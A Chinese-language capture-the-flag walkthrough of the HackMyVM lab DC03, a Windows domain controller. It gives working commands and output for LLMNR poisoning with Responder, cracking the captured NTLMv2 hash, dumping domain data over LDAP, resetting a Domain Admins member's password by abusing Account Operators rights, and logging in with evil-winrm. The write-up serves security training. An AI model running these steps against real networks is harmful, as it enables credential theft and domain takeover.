HackMyVm DC03 Walkthrough

靶机下载地址https://hackmyvm.eu/machines/machine.php?vm=DC03

这DC系列的第三个windows靶机。首先扫描端口。

└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 12:43 CST
Nmap scan report for 192.168.56.126
Host is up (0.00094s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-02 19:44:57Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49689/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:34:F9:29 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-02T19:45:45
|_  start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:34:f9:29 (Oracle VirtualBox virtual NIC)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 14h59m57s

接下来,无论是对smb、winrm还是kerberos的enum,都没有什么有效信息。打开wireshark,看看靶机有没有主动向外发送什么信息。果然,每隔一段时间,靶机会广播LLMNR请求,请求FileServer的IP地址。

Responder工具用于LLMNR协议的攻击,可以伪造答复信息。使用下面的命令,同时,不要关闭wireshark,进行观察。

└─$ sudo responder -I 'eth1' -dPv                                                                                                                                              
                                         __                                                                                                                                    
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.                                                                                                                       
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|                                                                                                                       
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|                                                                                                                         
                   |__|                                                                                                                                                        

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0          
...
[+] Listening for events...

[*] [NBT-NS] Poisoned answer sent to 192.168.56.126 for name FILESERVER (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.56.126  for name FileServer.local
[*] [LLMNR]  Poisoned answer sent to fe80::458b:f91b:ce63:497d for name FileServer
[*] [MDNS] Poisoned answer sent to fe80::458b:f91b:ce63:497d for name FileServer.local
[*] [MDNS] Poisoned answer sent to fe80::458b:f91b:ce63:497d for name FileServer.local
[*] [LLMNR]  Poisoned answer sent to fe80::458b:f91b:ce63:497d for name FileServer
[*] [MDNS] Poisoned answer sent to 192.168.56.126  for name FileServer.local
[*] [LLMNR]  Poisoned answer sent to 192.168.56.126 for name FileServer
[*] [LLMNR]  Poisoned answer sent to 192.168.56.126 for name FileServer
[SMB] NTLMv2-SSP Client   : fe80::458b:f91b:ce63:497d
[SMB] NTLMv2-SSP Username : soupedecode\xkate578
[SMB] NTLMv2-SSP Hash     : xkate578::soupedecode:e13dee503db0d6b2:4C73EEEB67B90B413B618692EE27D88A:0101000000000000804722A1192EDB01868DA316E356F982000000000200080038004D0055005A0001001E00570049004E002D004F005200370056004500460045004B0039005A00310004003400570049004E002D004F005200370056004500460045004B0039005A0031002E0038004D0055005A002E004C004F00430041004C000300140038004D0055005A002E004C004F00430041004C000500140038004D0055005A002E004C004F00430041004C0007000800804722A1192EDB01060004000200000008003000300000000000000000000000004000005D720517C9E069664257B190C6AA845B5904D0C02D27F17548BAC001F19B05220A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C0065005300650072007600650072000000000000000000

Responder得到了用户名和hash,同时,wireshark也显示出,靶机同时从ipv4和ipv6地址请求FireServer的地址,responder都给出的本机的ipv4地址,随后靶机向本机ipv6地址发出了smb的登录验证信息。

利用john破解该hash值,得到密码。

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt xkate578.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jesuschrist      (xkate578)     
1g 0:00:00:00 DONE (2024-11-03 18:13) 25.00g/s 25600p/s 25600c/s 25600C/s 123456..bethany
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

利用该用户名和密码,可以浏览smb信息。

└─$ smbclient -L $IP -U xkate578%jesuschrist

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        share           Disk      
        SYSVOL          Disk      Logon server share

进入smb后得到user flag。

└─$ smbclient //$IP/share -U xkate578%jesuschrist
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Thu Aug  1 14:06:14 2024
  ..                                  D        0  Thu Aug  1 13:38:08 2024
  desktop.ini                       AHS      282  Thu Aug  1 13:38:08 2024
  user.txt                            A       70  Thu Aug  1 13:39:25 2024
  ```

接下来,利用该用户,将域信息导出。
```bash
└─$ ldapdomaindump -u SOUPEDECODE.local\\xkate578 -p jesuschrist  $IP
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

└─$ ls                                                               
5985.log               domain_computers.json        domain_groups.html  domain_policy.html  domain_trusts.html  domain_users.html           port.log
domain_computers.grep  domain_computers_by_os.html  domain_groups.json  domain_policy.json  domain_trusts.json  domain_users.json           xkate578.hash
domain_computers.html  domain_groups.grep           domain_policy.grep  domain_trusts.grep  domain_users.grep   domain_users_by_group.html

查看domain_users文件,可以看到xkate578具有Account Operators权限。

同时,观察到fbeth103用户属于Operators用户组,而该组又是Domain Admins用户组的成员。

接下来的思路,就是利用xkate578的权限,修改fbeth103的密码。

└─$ impacket-changepasswd SOUPEDECODE.LOCAL/fbeth103@$IP -altuser xkate578 -altpass jesuschrist -newpass 12345678 -reset
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Setting the password of SOUPEDECODE.LOCAL\fbeth103 as SOUPEDECODE.LOCAL\xkate578
[*] Connecting to DCE/RPC as SOUPEDECODE.LOCAL\xkate578
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.

也可以利用rpcclient登录后进行修改。

└─$ rpcclient  -U  "xkate578" $IP 
Password for [WORKGROUP\xkate578]:
rpcclient $> setuserinfo2 fbeth103 23 12345678
rpcclient $> exit

接下来就可以使用fbeth103用户得到root。

└─$ evil-winrm -i $IP -u fbeth103  -p 12345678
...
*Evil-WinRM* PS C:\Users> cd Administrator
*Evil-WinRM* PS C:\Users\Administrator> dir

    Directory: C:\Users\Administrator

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         6/15/2024  10:54 AM                3D Objects
d-r---         6/15/2024  10:54 AM                Contacts
d-r---         7/31/2024  10:54 PM                Desktop
d-r---         7/31/2024  10:58 PM                Documents
d-r---         6/15/2024  10:54 AM                Downloads
d-r---         6/15/2024  10:54 AM                Favorites
d-r---         6/15/2024  10:54 AM                Links
d-r---         6/15/2024  10:54 AM                Music
d-r---         6/15/2024  10:54 AM                Pictures
d-r---         6/15/2024  10:54 AM                Saved Games
d-r---         6/15/2024  10:54 AM                Searches
d-r---         6/15/2024  10:54 AM                Videos

*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/31/2024  10:33 PM             70 root.txt

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注